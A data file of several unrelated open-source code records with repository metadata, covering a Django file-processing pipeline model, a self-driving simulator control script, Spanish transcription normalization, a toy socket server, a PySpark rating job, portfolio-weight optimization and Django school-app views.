django.core.validators import URLValidator\r\nfrom django.db import models\r\nimport celery\r\nimport magic\r\nimport mimetypes\r\nimport requests\r\n\r\nfrom core.json_schema.file import (\r\n check_is_internal_file,\r\n is_base64,\r\n)\r\nfrom core.models import WithDate\r\nfrom core.utils import random_uuid4\r\nfrom projects.models.project import Project\r\nfrom projects.models.processor import Processor\r\n\r\n\r\nclass Pipeline(WithDate, models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\r\n title = models.CharField(max_length=666, null=False, blank=False)\r\n description = models.TextField(blank=True, null=True)\r\n is_active = models.BooleanField(blank=True, default=True)\r\n processors = models.JSONField(null=True, blank=True)\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n def check_is_internal_file(self, data):\r\n if not check_is_internal_file(data):\r\n _, is_opened = PipelineResult.open_file(data)\r\n if is_opened:\r\n return True\r\n else:\r\n return True\r\n return False\r\n\r\n def create_result(self, data):\r\n result_object = PipelineResult.objects.create(pipeline=self)\r\n\r\n if self.accepts_file() and self.check_is_internal_file(data):\r\n input_file = result_object.save_file(data)\r\n data = {\r\n \"id\": input_file.pk,\r\n }\r\n\r\n # Generate a task to queue processing\r\n celery.current_app.send_task(\r\n \"projects.tasks.process_pipeline\",\r\n kwargs={\r\n \"result_id\": result_object.pk,\r\n \"processors\": self.processors,\r\n \"data\": data,\r\n \"error\": None,\r\n },\r\n )\r\n\r\n return result_object\r\n\r\n def requires_input_data(self):\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n return first_processor.requires_input()\r\n\r\n return False\r\n\r\n def get_first_processor(self):\r\n first_processor = None\r\n if self.processors and len(self.processors) > 0:\r\n first_processor = Processor.objects.get(pk=self.processors[0][\"id\"])\r\n\r\n return first_processor\r\n\r\n def check_input_data(self, data):\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n first_processor.check_input_data(data)\r\n\r\n return\r\n\r\n def accepts_file(self):\r\n \"\"\"\r\n Helper for first processor input data type\r\n \"\"\"\r\n first_processor = self.get_first_processor()\r\n if first_processor:\r\n return first_processor.input_is_file()\r\n\r\n return False\r\n\r\n @classmethod\r\n def housekeeping(cls, conditions: models.Q = None, date_start=None, date_end=None):\r\n \"\"\"\r\n Mass Results cleanup\r\n \"\"\"\r\n if not conditions:\r\n conditions = models.Q()\r\n\r\n if date_start:\r\n conditions &= models.Q(ctime__gte=date_start)\r\n\r\n if date_end:\r\n conditions &= models.Q(ctime__lte=date_end)\r\n\r\n results = PipelineResult.objects.filter(conditions)\r\n for result in results:\r\n result.delete()\r\n\r\n def remove_results(self, date_start=None, date_end=None):\r\n \"\"\"\r\n Remove all Results and Associated Files\r\n older than some moment\r\n \"\"\"\r\n conditions = models.Q(pipeline=self)\r\n Pipeline.housekeeping(\r\n conditions=conditions, date_start=date_start, date_end=date_end\r\n )\r\n\r\n def delete(self):\r\n \"\"\"\r\n Remove all Results and Associated Files\r\n \"\"\"\r\n self.remove_results()\r\n\r\n super().delete()\r\n\r\n\r\nclass PipelineResult(models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n pipeline = models.ForeignKey(Pipeline, on_delete=models.CASCADE, editable=False)\r\n ctime = models.DateTimeField(null=True, blank=True, auto_now_add=True)\r\n error = models.JSONField(null=True, blank=True)\r\n result = models.JSONField(null=True, blank=True)\r\n is_finished = models.BooleanField(blank=True, default=False)\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n def get_last_file(self):\r\n return PipelineResultFile.objects.filter(pipeline_result=self).last()\r\n\r\n def delete_unused_files(self):\r\n if not self.result:\r\n return\r\n\r\n for _file in PipelineResultFile.objects.filter(pipeline_result=self):\r\n if self.result.get(\"id\") != str(_file.id):\r\n _file.delete()\r\n\r\n def delete(self):\r\n for _file in PipelineResultFile.objects.filter(pipeline_result=self):\r\n _file.delete()\r\n\r\n super().delete()\r\n\r\n @classmethod\r\n def open_file(cls, data, raise_exception=False):\r\n input_file = None\r\n is_opened = False\r\n\r\n if check_is_internal_file(data):\r\n input_file = data\r\n is_opened = True\r\n elif isinstance(data, str):\r\n url_validator = URLValidator()\r\n\r\n # It may be a valid URL or base64 encoded string\r\n try:\r\n try:\r\n url_validator(data)\r\n response = requests.get(data)\r\n response.raise_for_status()\r\n input_file = io.BytesIO(response.content)\r\n is_opened = True\r\n except ValidationError:\r\n if is_base64(data):\r\n input_file = io.BytesIO(base64.b64decode(data))\r\n is_opened = True\r\n except Exception as e:\r\n if raise_exception:\r\n raise e\r\n input_file = data\r\n\r\n elif isinstance(data, dict):\r\n if \"id\" in data:\r\n try:\r\n _file = PipelineResultFile.objects.get(pk=data[\"id\"])\r\n input_file = _file.open()\r\n is_opened = True\r\n except Exception as e:\r\n if raise_exception:\r\n raise e\r\n input_file = data\r\n\r\n return input_file, is_opened\r\n\r\n def save_file(self, data):\r\n input_file = PipelineResultFile()\r\n input_file.prepare()\r\n\r\n converted_data, is_opened = PipelineResult.open_file(data)\r\n\r\n if self.pipeline.check_is_internal_file(data) and is_opened:\r\n default_storage.save(input_file.path, ContentFile(converted_data.read()))\r\n input_file.post_process(self)\r\n\r\n return input_file\r\n\r\n\r\nclass PipelineResultFile(models.Model):\r\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\r\n path = models.CharField(max_length=666, null=False, blank=False)\r\n extension = models.CharField(max_length=10, null=True, blank=True)\r\n pipeline_result = models.ForeignKey(\r\n PipelineResult, on_delete=models.CASCADE, editable=False\r\n )\r\n md5_hash = models.CharField(max_length=64, editable=False)\r\n size = models.BigIntegerField(default=0)\r\n mimetype = models.CharField(max_length=666, null=True, blank=True)\r\n ctime = models.DateTimeField(null=True, blank=True, auto_now_add=True)\r\n\r\n _saved = False\r\n\r\n def __str__(self):\r\n return str(self.id)\r\n\r\n @classmethod\r\n def remove_by_id(cls, file_id: dict = None):\r\n if not file_id:\r\n return\r\n\r\n file_path = os.path.join(settings.MEDIA_ROOT, file_id)\r\n if os.path.exists(file_path):\r\n os.remove(file_path)\r\n\r\n def delete(self):\r\n if os.path.exists(self.path):\r\n os.remove(self.path)\r\n\r\n super().delete()\r\n\r\n def prepare(self, *args, **kwargs):\r\n self.id = random_uuid4()\r\n self.path = os.path.join(settings.MEDIA_ROOT, self.id)\r\n\r\n if os.path.isfile(self.path):\r\n self._saved = True\r\n\r\n def post_process(self, pipeline_result):\r\n hash_md5 = hashlib.md5()\r\n\r\n if not self._saved:\r\n with open(self.path, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n\r\n f.seek(0, os.SEEK_END)\r\n self.size = f.tell()\r\n\r\n \"\"\"\r\n Possible Vulnerability:\r\n\r\n * Worker may set file's `mimetype`\r\n \"\"\"\r\n if not self.mimetype:\r\n try:\r\n mime = magic.Magic(mime=True)\r\n self.mimetype = mime.from_file(self.path)\r\n except Exception as e:\r\n pass\r\n\r\n if self.mimetype:\r\n self.extension = mimetypes.guess_extension(self.mimetype)\r\n\r\n if self.extension:\r\n if not self.path.endswith(self.extension):\r\n old_path = self.path\r\n self.path = self.path + self.extension\r\n\r\n os.rename(old_path, self.path)\r\n\r\n self.md5_hash = hash_md5.hexdigest()\r\n self.pipeline_result = pipeline_result\r\n self.save()\r\n self._saved = True\r\n\r\n def open(self):\r\n return open(self.path, \"rb\")\r\n\r\n def write(self, data):\r\n with open(self.path, \"wb\") as e:\r\n e.write(data)\r\n","repo_name":"firewut/data-transform-pipelines-api","sub_path":"src/projects/models/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37760787603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 11:55:05 2019\n\n@author: AI & ML\n\"\"\"\nimport numpy as np\nimport socketio#for integrating with gain using server.\nimport eventlet\nfrom flask import Flask\nfrom keras.models import load_model#it is used for loading the model in the enviroment\nimport base64\nfrom io import BytesIO#these are used for working with images.\nfrom PIL import Image\nimport cv2\n\nsio = socketio.Server()#used for creating the server.\n\napp = Flask(__name__) #'__main__'#used for handling pourpose.\n\nspeed_limit = 30#for speed limit of the car.\n\ndef img_preprocess(img):\n img = img[60:135,:,:]\n img = cv2.cvtColor(img,cv2.COLOR_RGB2YUV)\n img = cv2.GaussianBlur(img, (3,3),0)\n img = cv2.resize(img,(200,66))\n img = img/255\n \n return img\n\n\n\n@sio.on('telemetry')#send signal to your gain.\n\ndef telemetry(sid, data):\n speed = float(data['speed'])\n image = Image.open(BytesIO(base64.b64decode(data['image'])))#take image from gain.\n image = np.asarray(image)\n image = img_preprocess(image)\n image = np.array([image])\n steering_angle = float(model.predict(image))#predicting the steering angle.\n throttle = 1.0 - speed/speed_limit#predicting the throttle.\n print('{} {} {}'.format(steering_angle, throttle,speed))\n send_control(steering_angle,throttle)#sending the command.\n\n@sio.on('connect')#message, disconnect#used for connecting the gain\n\ndef connect(sid, environ):\n print('connected')\n send_control(0,0)\n \ndef send_control(steering_angle,throttle):#using telementry send the image\n sio.emit('steer',data={\n 'steering_angle':steering_angle.__str__(),\n 'throttle':throttle.__str__()\n })\n \n\nif __name__=='__main__':#loading the model which we have downloaded from google colab.\n model = load_model(r\"D:\\Courses\\AI & ML\\beta_simulator_windows\\training data\\model.h5\")\n app = socketio.Middleware(sio,app)#for creating the tunnel in between.\n eventlet.wsgi.server(eventlet.listen(('',4567)),app)#used for code forwarding.\n","repo_name":"raviroushan/self_driving_car","sub_path":"drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39941185757","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 fdm=marker :\n\"\"\"\nThis module provides tools for **ENGLISH** normalisation of transcriptions, mainly for\nthose obtained from human transcribers.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport re\n\n__all__ = ['normalise_text', 'exclude', 'exclude_by_dict']\n\n_nonspeech_events = ['_SIL_', '_INHALE_', '_LAUGH_', '_EHM_HMM_', '_NOISE_', '_EXCLUDE_',]\n\nfor idx, ne in enumerate(_nonspeech_events):\n _nonspeech_events[idx] = (re.compile(r'((\\b|\\s){pat}(\\b|\\s))+'.format(pat=ne)), ' '+ne+' ')\n\n# nonspeech event transcriptions {{{\n_nonspeech_map = {\n '_SIL_': (\n '(SIL)',\n '(SILENCE)',\n '(QUIET)',\n '(CLEARING)',\n '',\n ),\n '_INHALE_': (\n '(INHALE)',\n '(BREATH)',\n '(BREATHING)',\n '(SNIFFING)',\n '',\n ),\n '_LAUGH_': (\n '(LAUGH)',\n '(LAUGHING)',\n '',\n ),\n '_EHM_HMM_': (\n '(EHM_HMM)',\n '(HESITATION)',\n '(HUM)',\n '',\n '',\n '',\n '',\n '',\n '',\n ),\n '_NOISE_': (\n '(NOISE)',\n '(NOISES)',\n '(COUCHING)',\n '(COUGH)',\n '(COUGHING)',\n '(LIPSMACK)',\n '(POUNDING)',\n '(RING)',\n '(RINGING)',\n '(INTERFERENCE)',\n '(KNOCKING)',\n '(BANG)',\n '(BANGING)',\n '(BACKGROUNDNOISE)',\n '(BABY)',\n '(BARK)',\n '(BARKING)',\n '(NOISE)',\n '(NOISES)',\n '(STATIC)',\n '(SCRAPE)',\n '(SQUEAK)',\n '(TVNOISE)',\n '',\n ),\n '_EXCLUDE_': (\n '(EXCLUDE)',\n '(PERSONAL)',\n '(VULGARISM)',\n '(UNINTELLIGIBLE)',\n '(UNINT)',\n )\n}\n#}}}\n_nonspeech_trl = dict()\nfor uscored, forms in _nonspeech_map.iteritems():\n for form in forms:\n _nonspeech_trl[form] = uscored\n\n# substitutions {{{\n_subst = [\n ('_EXCLUDE_', '_EXCLUDE_'),\n ('ACUESTATE', 'ACUÉSTATE'),\n ('ALÓ', 'HALÓ'),\n ('AYUDAME', 'AYÚDAME'),\n ('BIOLOGIA', 'BIOLOGÍA'),\n ('CIENTIFICOS', 'CIENTÍFICOS'),\n ('DEMAS', 'DEMÁS'),\n ('FISCALIA', 'FISCALÍA'),\n ('GANACIA', 'GANANCIA'),\n ('GARABOA', 'GARAGOA'),\n ('INJUSTSICIA', 'INJUSTICIA'),\n ('INMANULADA', 'INMACULADA'),\n ('UDSTED', 'USTED'),\n# ('', ''),\n ]\n#}}}\nfor idx, tup in enumerate(_subst):\n pat, sub = tup\n _subst[idx] = (re.compile(r'(^|\\s){pat}($|\\s)'.format(pat=pat)), ' '+sub+' ')\n\n# hesitation expressions {{{\n_hesitation = ['AAAA', 'AAA', 'AA', 'AAH', 'A-', \"-AH-\", \"AH-\", \"AH.\", \"AH\",\n \"AHA\", \"AHH\", \"AHHH\", \"AHMA\", \"AHM\", \"ANH\", \"ARA\", \"-AR\",\n \"AR-\", \"-AR\", \"ARRH\", \"AW\", \"EA-\", \"-EAR\", \"-EECH\", \"\\\"EECH\\\"\",\n \"-EEP\", \"-E\", \"E-\", \"EH\", \"EM\", \"--\", \"ER\", \"ERM\", \"ERR\",\n \"ERRM\", \"EX-\", \"F-\", \"HM\", \"HMM\", \"HMMM\", \"-HO\", \"HUH\", \"HU\",\n \"HUM\", \"HUMM\", \"HUMN\", \"HUMN\", \"HUMPH\", \"HUP\", \"HUU\", \"-\",\n \"MM\", \"MMHMM\", \"MMM\", \"NAH\", \"OHH\", \"OH\", \"SH\", \"UHHH\", \"EMMM\"\n \"UHH\", \"UHM\", \"UH'\", \"UH\", \"UHUH\", \"UHUM\", \"UMH\", \"UMM\", \"UMN\",\n \"UM\", \"URM\", \"URUH\", \"UUH\", \"ARRH\", \"AW\", \"EM\", \"ERM\", \"ERR\",\n \"ERRM\", \"HUMN\", \"UM\", \"UMN\", \"URM\", \"AH\", \"ER\", \"ERM\", \"HUH\",\n \"HUMPH\", \"HUMN\", \"HUM\", \"HU\", \"SH\", \"UH\", \"UHUM\", \"UM\", \"UMH\",\n \"URUH\", \"MMMM\", \"MMM\", \"OHM\", \"UMMM\", \"MHMM\", \"EMPH\", \"HMPH\",\n \"UGH\", \"UHH\", \"UMMMMM\", \"SHH\", \"OOH\", ]\n# }}}\nfor idx, word in enumerate(_hesitation):\n _hesitation[idx] = re.compile(r'(^|\\s){word}($|\\s)'.format(word=word))\n\n_more_spaces = re.compile(r'\\s{2,}')\n_sure_punct_rx = re.compile(r'[.?!\",_\\n]')\n_parenthesized_rx = re.compile(r'\\(+([^)]*)\\)+')\n\n\ndef normalise_text(text):\n \"\"\"\n Normalises the transcription. This is the main function of this module.\n \"\"\"\n text = _sure_punct_rx.sub(' ', text)\n text = text.strip().upper()\n\n # Do dictionary substitutions.\n for pat, sub in _subst:\n text = pat.sub(sub, text)\n for word in _hesitation:\n text = word.sub(' (HESITATION) ', text)\n text = _more_spaces.sub(' ', text).strip()\n \n # Handle non-speech events (separate them from words they might be\n # agglutinated to, remove doubled parentheses, and substitute the known\n # non-speech events with the forms with underscores).\n #\n # This step can incur superfluous whitespace.\n if '(' in text or '<' in text:\n text = _parenthesized_rx.sub(r' (\\1) ', text)\n for parenized, uscored in _nonspeech_trl.iteritems():\n text = text.replace(parenized, uscored)\n text = _more_spaces.sub(' ', text.strip())\n\n # remove duplicate non-speech events\n for pat, sub in _nonspeech_events:\n text = pat.sub(sub, text)\n text = _more_spaces.sub(' ', text).strip()\n\n for char in '^':\n text = text.replace(char, '')\n\n return text\n\n_excluded_characters = set(['\\n', '=', '-', '*', '+', '~', '(', ')', '[', ']', '{', '}', '<', '>',\n '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n\ndef exclude_asr(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for training ASR.\n\n Determines whether `text' is not good enough and should be excluded.\n \"Good enough\" is defined as containing none of `_excluded_characters' and being\n longer than one word.\n \"\"\"\n if '_EXCLUDE_' in text:\n return True\n\n if text in ['_SIL_', ]:\n return True\n\n if text in ['_NOISE_', '_EHM_HMM_', '_INHALE_', '_LAUGH_']:\n return False\n\n # allow for sentences with these non-speech events if mixed with text\n for s in ['_NOISE_', '_INHALE_', '_LAUGH_']:\n text = text.replace(s,'')\n\n for char in _excluded_characters:\n if char in text:\n return True\n if '_' in text:\n return True\n\n if len(text) < 2:\n return True\n\n return False\n\ndef exclude_lm(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for Language Modeling.\n\n Determines whether `text' is not good enough and should be excluded.\n \"Good enough\" is defined as containing none of `_excluded_characters' and being\n longer than one word.\n \"\"\"\n\n if '_EXCLUDE_' in text:\n return True\n\n for char in _excluded_characters:\n if char in text:\n return True\n\n return False\n\ndef exclude_slu(text):\n \"\"\"\n This function is used for determining whether the transcription can be used for training Spoken Language Understanding.\n \"\"\"\n return exclude_lm(text)\n\ndef exclude_by_dict(text, known_words):\n \"\"\"\n Determines whether text is not good enough and should be excluded.\n\n \"Good enough\" is defined as having all its words present in the\n `known_words' collection.\"\"\"\n return not all(map(lambda word: word in known_words, text.split()))\n","repo_name":"UFAL-DSG/alex","sub_path":"alex/corpustools/text_norm_es.py","file_name":"text_norm_es.py","file_ext":"py","file_size_in_byte":7042,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"52"} +{"seq_id":"11610522712","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/9/24 11:38\n# @Author : XiaTian\n# @File : 1、WEB基础介绍.py\n\nfrom socket import *\n\nserver = socket()\nserver.bind(('127.0.0.1',8080))\nserver.listen(5)\n\nwhile True:\n conn,addr = server.accept()\n data = conn.recv(1024)\n print(data)\n\n with open('login.html','r') as f:\n sendd = f.read()\n\n conn.send(('http/1.1 200 OK\\r\\n\\r\\n%s'%sendd).encode('utf8'))\n conn.close()\n","repo_name":"summer5625/Mygit","sub_path":"第六模块_WEB框架/Django框架/1、WEB基础介绍.py","file_name":"1、WEB基础介绍.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26863196708","text":"from pyspark import SparkContext\n\nif __name__ == \"__main__\":\n sc = SparkContext.getOrCreate()\n business_l = sc.textFile(\"dataset/business.csv\").map(lambda x: x.split(\"::\")).filter(lambda x: \"NY\" in x[1])\n review_l = sc.textFile(\"dataset/review.csv\").map(lambda x: x.split(\"::\"))\n business_set = business_l.map(lambda x: (x[0], x[1] + \" \" + x[2]))\n\n sum_rating = review_l.map(lambda a: (a[2], float(a[3]))).reduceByKey(lambda a, b: a + b).partitionBy(1)\n count_rating = review_l.map(lambda a: (a[2], 1)).reduceByKey(lambda a, b: a + b).partitionBy(1)\n\n join_result = sum_rating.join(count_rating)\n rating_avg = join_result.map(lambda a: (a[0], a[1][0] / a[1][1]))\n\n result_final = business_set.join(rating_avg).distinct(1).sortBy(lambda a: a[1][1], ascending=False)\n result_final.saveAsTextFile(\"Output/TopTenBusinessOutput\")\n print(result_final.top(10))\n sc.stop()\n","repo_name":"sankalpbhandari/SparkMapReduce","sub_path":"TopTenBusiness.py","file_name":"TopTenBusiness.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75393821603","text":"import numpy as np\nimport random\nimport pandas as pd\nfrom port_inventory import *\nimport itertools\nimport cProfile, pstats, io\nfrom numba import njit, jit\nimport gc, os\nimport matplotlib.pyplot as plt\n\n\n#Slow\ndef make_ret_mat(port, tickers):\n day_ret_mat = []\n ann_rets = []\n for tick in tickers:\n day_ret_mat.append(np.array(port.holdings[tick].daily_ret)[1:]*100)\n ann_rets.append(get_ann_ret(port.holdings[tick].daily_ret))\n\n day_ret_mat = np.array(day_ret_mat)\n ann_rets = np.array(ann_rets).transpose()\n \n return day_ret_mat, ann_rets\n\n\ndef get_ann_ret(ret_list):\n ret_list = [x+1 for x in ret_list]\n ret = np.nanprod(ret_list)-1\n return ret*100\n\n\ndef weight_cov(weights):\n return [weights, np.outer(weights, weights)]\n\n\ndef create_weights(num_in_port, iters):\n weights = []\n l, h = [1, 2]\n for i in range(0, int(iters * .8)):\n group_1 = [random.uniform(0, 1) for x in range(0, num_in_port)]\n weights.append([group_1[x] / sum(group_1) for x in range(0, len(group_1))])\n for i in range(int(iters * .8), int(iters * .9)):\n group_2 = [random.uniform(l, h) for x in [1]] + [random.uniform(0, 1) for x in range(0, num_in_port - 1)]\n weights.append([group_2[x] / sum(group_2) for x in range(0, len(group_2))])\n for i in range(int(iters * .9), int(iters)):\n group_3 = [random.uniform(l, h) for x in [1, 2]] + [random.uniform(0, 1) for x in range(0, num_in_port - 2)]\n weights.append([group_3[x] / sum(group_3) for x in range(0, len(group_3))])\n\n weights = np.array([np.array(l) for l in weights])\n\n return [*map(weight_cov, weights)]\n\n\ndef create_weights_w_allo(num_in_port, iters, given_weights):\n allos = []\n for g in range(0, len(given_weights)):\n if given_weights[g] > 0:\n allos.append([g, given_weights[g]])\n\n num_in_port -= len(allos)\n weights = []\n l, h = [1, 2]\n for i in range(0, int(iters * .8)):\n group_1 = [random.uniform(0, 1) for x in range(0, num_in_port)]\n weights.append([group_1[x]/sum(group_1) for x in range(0, len(group_1))])\n for i in range(int(iters * .8), int(iters * .9)):\n group_2 = [random.uniform(l, h) for x in [1]] + [random.uniform(0, 1) for x in range(0, num_in_port - 1)]\n weights.append([group_2[x]/sum(group_2) for x in range(0, len(group_2))])\n for i in range(int(iters * .9), int(iters)):\n group_3 = [random.uniform(l, h) for x in [1, 2]] + [random.uniform(0, 1) for x in range(0, num_in_port - 2)]\n weights.append([group_3[x]/sum(group_3) for x in range(0, len(group_3))])\n\n w_allo = []\n for wts in weights:\n for al in allos:\n wts.insert(*al)\n w_sum = sum(wts)\n w_allo.append([w/w_sum for w in wts])\n\n weights = np.array([np.array(l) for l in w_allo])\n\n return [*map(weight_cov, weights)]\n\n\ndef weight_cov_mat(weight_cov, cov_mat):\n return np.matmul(weight_cov, cov_mat)\n\n\ndef get_slope(exp_ret, std, risk_free):\n return (exp_ret-risk_free)/std\n\n\ndef find_best_slope(slope_list, iterations):\n slopes = [x[3] for x in slope_list]\n high = np.unique(slopes)[int(iterations*.999)]\n max_s = [x for x in range(0, len(slopes)) if slopes[x] == high]\n return slope_list[max_s[0]]\n\n\ndef create_port_dict(tickers, best_weights):\n labels = tickers + ['exp_ret', 'std_dev']\n weights = [i for i in best_weights[0]]\n port_data = weights + best_weights[1:]\n port_dict = dict(zip(labels, port_data))\n\n return port_dict\n\n\ndef find_optimal_ports(port, combo, weight_cov, begin_stocks, iterations, risk_free):\n ##create all combinations of world of tickers\n print(combo)\n select_ticks = [i for i in combo]\n tickers = begin_stocks + select_ticks\n day_ret_mat, ann_rets = make_ret_mat(port, tickers)\n\n '''from a list of beginning stocks, \n find those stocks with the closest to zero from abs correlation values'''\n\n cov_mat = np.cov(day_ret_mat)\n data_result = []\n for wts in weight_cov:\n ##multiply weights by ret for expected return\n ##possibly assign randomly multiple times in order to maximize computing efficiency\n exp_ret = np.dot(np.array(wts[0]), ann_rets)\n\n # find port variance\n w_cov_mat = weight_cov_mat(wts[1], cov_mat)\n port_var = np.sqrt(np.sum(w_cov_mat))*np.sqrt(len(day_ret_mat))\n slope = get_slope(exp_ret, port_var, risk_free)\n data = [wts[0], exp_ret, port_var, slope]\n data_result.append(data)\n\n best_wts = find_best_slope(data_result, iterations)\n port_dict = create_port_dict(tickers, best_wts)\n\n return port_dict\n","repo_name":"jmdubish1/portfolio_tracker","sub_path":"optimal_port_decisions.py","file_name":"optimal_port_decisions.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73102532644","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse as r\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import logout\nfrom django.contrib import messages\nfrom django.views.generic import CreateView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\n\nfrom django.contrib.auth import logout\nfrom .forms import PhotoForm, AttendanceForm, CreateUserForm, StudentForm\nfrom .models import ClassRoom, Teacher, Student, Class, BasicUser, Coordinator,Event\n\n\n@login_required\ndef create_user_type_view(request, user_type):\n template_name = 'registration/create_user.html'\n types = ('coordinator', 'teacher')\n current_user = request.user\n if user_type not in types:\n raise Http404\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n if user_type == 'coordinator':\n Coordinator.objects.create(user=user)\n elif user_type == 'teacher':\n Teacher.objects.create(user=user)\n return redirect(r('home_dashboard'))\n else:\n form = CreateUserForm()\n context = {'form': form,\n 'current_user': current_user}\n return render(request, template_name, context)\n\n\n@login_required\ndef create_student_view(request):\n template_name = 'registration/create_student.html'\n current_user = request.user\n if request.method == 'POST':\n userform = CreateUserForm(request.POST)\n studentform = StudentForm(request.POST)\n if userform.is_valid() and studentform.is_valid():\n user = userform.save()\n student = studentform.save(commit=False)\n student.user = user\n student.save()\n return redirect(r('home_dashboard'))\n else:\n userform = CreateUserForm()\n studentform = StudentForm()\n context = {\n 'userform': userform,\n 'studentform': studentform,\n 'current_user': current_user\n }\n return render(request, template_name, context)\n\n\n@login_required\ndef home_dashboard(request):\n current_user = request.user\n user = Coordinator.objects.filter(user__id=current_user.id)\n\n if user:\n return render(request, 'ecweb/coordinator-dashboard.html',\n {'coordinator': user.first(),\n 'current_user': current_user})\n\n user = Teacher.objects.filter(user__id=current_user.id)\n if user:\n return render(request, 'ecweb/teacher-dashboard.html',\n {'teacher': user.first(),\n 'current_user': current_user})\n\n user = Student.objects.filter(user__id=current_user.id)\n if user:\n date_start = current_user.date_joined.date()\n days_con = date.today() - date_start\n days_cont_int = int(days_con.days)\n if user[0].type_of_course == \"1-month\":\n count_day = 30 - days_cont_int\n percent = int(-100.0 * (count_day / 30))\n\n else:\n count_day = 30 * 6 - days_cont_int\n percent = int(100.0 * (count_day / (30 * 6)))\n\n return render(request, 'ecweb/student-dashboard.html',\n {'student': user.first(),\n 'current_user': current_user,\n 'days_cont_int': days_cont_int})\n\n raise Http404\n\n\n@login_required\ndef user_detail(request):\n current_user = request.user\n insta = get_object_or_404(BasicUser, pk=int(current_user.id))\n\n if request.method == 'POST':\n if \"change_password\" in request.POST:\n\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(\n request, 'Your password was successfully updated!')\n return redirect('user_detail')\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'ecweb/student.html', {\n 'form': form\n })\n\n else:\n\n form = PhotoForm(request.POST, request.FILES, instance=insta)\n if form.is_valid():\n profil = form.save()\n profil.user = current_user\n profil.save()\n\n return redirect('user_detail')\n else:\n form = PhotoForm()\n return render(request, 'ecweb/student.html',\n {'current_user': current_user, 'form': form})\n\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(\n request, 'Your password was successfully updated!')\n return redirect('change_password')\n else:\n messages.error(request, 'Please correct the error below.')\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'registration/change-password.html', {\n 'form': form\n })\n\n\ndef logout_view(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\n@login_required\ndef calendar_view(request):\n events = Calendar.objects.all()\n return render(request, 'ecweb/calendar.html', {'events': events})\n\n\nclass ClassRoomListView(LoginRequiredMixin, ListView):\n\n model = ClassRoom\n template_name = 'ecweb/classroom/classroom.html'\n\n def get_queryset(self):\n current_user = self.request.user\n\n queryset = super(ClassRoomListView, self).get_queryset()\n\n if current_user.is_staff:\n teacher = Teacher.objects.filter(user=current_user.id)\n\n if teacher.exists():\n queryset = ClassRoom.objects.filter(\n teachers=teacher.first().id,\n is_active=True\n )\n\n else:\n queryset = ClassRoom.objects.filter(is_active=True)\n\n else:\n student = Student.objects.get(user=current_user.id)\n queryset = ClassRoom.objects.filter(\n students=student.id, is_active=True)\n\n return queryset\n\n\nclass ClassRoomDetailView(LoginRequiredMixin, DetailView):\n model = ClassRoom\n template_name = 'ecweb/classroom/detail_classroom.html'\n\n def dispatch(self, request, *args, **kwargs):\n classroom = self.get_object()\n user = request.user\n\n is_coordinator = Coordinator.objects.filter(user=user).exists()\n student_in_classroom = classroom.students.all().filter(user=user).exists()\n teacher_in_classroom = classroom.teachers.all().filter(user=user).exists()\n\n if not (student_in_classroom or teacher_in_classroom or is_coordinator):\n return redirect('classroom_view')\n\n if not classroom.is_active:\n return redirect('classroom_view')\n\n return super(ClassRoomDetailView, self).dispatch(request, *args, **kwargs)\n\n\nclass ClassRoomCreateView(LoginRequiredMixin, PermissionRequiredMixin, CreateView):\n model = ClassRoom\n template_name = 'ecweb/classroom/create_classroom.html'\n success_url = reverse_lazy('classroom_view')\n permission_required = 'ecweb.view_all_classrooms'\n fields = (\n 'number_class',\n 'level',\n 'students',\n 'teachers',\n 'turn'\n )\n\n def form_valid(self, form):\n\n self.object = form.save(commit=False)\n\n classroom_exists = ClassRoom.objects.filter(\n number_class=self.object.number_class,\n 